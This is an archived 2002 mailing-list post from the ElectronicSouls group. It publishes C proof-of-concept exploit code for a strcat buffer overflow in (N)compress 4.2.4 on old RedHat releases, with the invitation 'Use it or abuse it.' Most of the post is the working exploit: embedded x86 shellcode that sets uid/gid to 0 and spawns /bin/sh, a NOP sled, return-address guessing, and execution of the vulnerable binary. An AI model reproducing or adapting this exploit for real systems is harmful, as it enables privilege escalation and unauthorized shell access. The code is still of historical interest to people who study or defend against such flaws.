[<prev] [next>] [day] [month] [year] [list]
Message-ID: <200211290713.gAT7DINB054556@mailserver2.hushmail.com>
From: es at hush.com (es@...h.com)
Subject: [ElectronicSouls] - /usr/bin/compress exploit
-----BEGIN PGP SIGNED MESSAGE-----
Dear List,
Here is a proof-of-concept code demonstrating a vulnerability in
/usr/bin/compress. Use it or abuse it.
/*
* PROOF OF CONCEPT
* Information System Advancement in Penetration (ISAP) Labs
*
* (N)compress 4.2.4 Exploit
* By: Lunar Fault [ElectronicSouls]
*
* Vulnerable Systems found is: RedHat 6.2, 7.0, 7.1, and 7.2
*
* Discription: Simple unchecked b0f involving strcat. This
* exploit was tested on RedHat 6.2, 7.0, and 7.1. This is only a
* Proof of concept. /usr/bin/compress is not suid root by default.
*
* April 22, 2002
*/
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#define VULN "/usr/bin/compress"
#define NOP 0x90909090
#define NOPLEN 500
/* Thanx to 0x90 for the shellcode :) */
/* Shellcode does a chuid(0), chgrp(0), then executes /bin/sh */
const unsigned char linux_x86_exec_hellcode[] =
"\x29\xc0\xb0\x46\x29\xdb\xb3\x0c\x80\xeb\x0c\x89\xd9\xcd\x80\xeb\x18\x5e\x29"
"\xc0\x88\x46\x07\x89\x46\x0c\x89\x76\x08\xb0\x0b\x87\xf3\x8d\x4b\x08\x8d\x53"
"\x0c\xcd\x80\xe8\xe3\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68";
unsigned long get_sp(void)
{
__asm__(" mov %esp, %eax");
}
void usage(char *prog)
{
printf("<+> (N)compress 4.2.4 Exploit\n");
printf("<+> By: Lunar Fault [ElectronicSouls]\n");
printf("<+> Information System Advancement in Penetration (ISAP) Labs\n");
printf("<!> usage: %s [options]\n", prog);
printf("\t\t-h help\n");
printf("\t\t-o <offset> Example: 100\n");
printf("\t\t-r <return> Example: 0xbfffc680\n");
printf("\t\t-s <size> Example: 1056\n");
exit(1);}
int main(int argv, char *argc[]) {
int i, c, ret, offset;
long len;
char *buffer;
offset = 0;
len = 1056;
ret = get_sp();
ret = ret - 250; /* Subtracting 250 from sp to bring the return somewhere in the NOP */
printf("<+> (N)compress 4.2.4 Exploit\n");
printf("<+> By: Lunar Fault [ElectronicSouls]\n");
printf("<+> Information System Advancement in Penetration (ISAP) Labs\n");
if (argv > 1) {
while ((c = getopt (argv, argc, "r:s:o:h"))!=EOF) {
switch(c) {
case 'r':
ret = strtoll(optarg, NULL, 0);
break;
case 's':
len = atoi(optarg);
if (len < (NOPLEN + strlen(linux_x86_exec_hellcode) + 100)) {
printf("<!> Size is too small to work\n");
exit(1);
}
break;
case 'o':
offset = atoi(optarg);
break;
case 'h':
usage(argc[0]);
}
}
}
buffer = (char *) malloc(len);
ret = ret + offset;
for (i=0;i<len;i+=4)
*(long*) &buffer[i] = NOP;
for (i=NOPLEN;i<len;i+=4)
*(long*) &buffer[i] = ret;
memcpy(buffer+NOPLEN, linux_x86_exec_hellcode, strlen(linux_x86_exec_hellcode));
printf("<*> Offset = %d\n", offset);
printf("<*> Return = 0x%.8x\n", ret);
printf("<*> Size = %d\n\n", len);
execl(VULN, VULN, buffer, 0);
return 0;
}
#
The Electronic Souls Crew
[ElectronicSouls] (c) 2002
"The end is now."
-----BEGIN PGP SIGNATURE-----
Version: Hush 2.2 (Java)
Note: This signature can be verified at https://www.hushtools.com/verify
wlMEARECABMFAj3nE50MHGVzQGh1c2guY29tAAoJEN5nGqhGcjlt2zUAoKzlEfXzhbiX
0IwM3GWiRfyNWub8AJ4zOt0daZO93e2HHyokvrfcS/vTQQ==
=ABKy
-----END PGP SIGNATURE-----
Concerned about your privacy? Follow this link to get
FREE encrypted email: https://www.hushmail.com/?l=2
Big $$$ to be made with the HushMail Affiliate Program:
https://www.hushmail.com/about.php?subloc=affiliate&l=427
Powered by blists - more mailing lists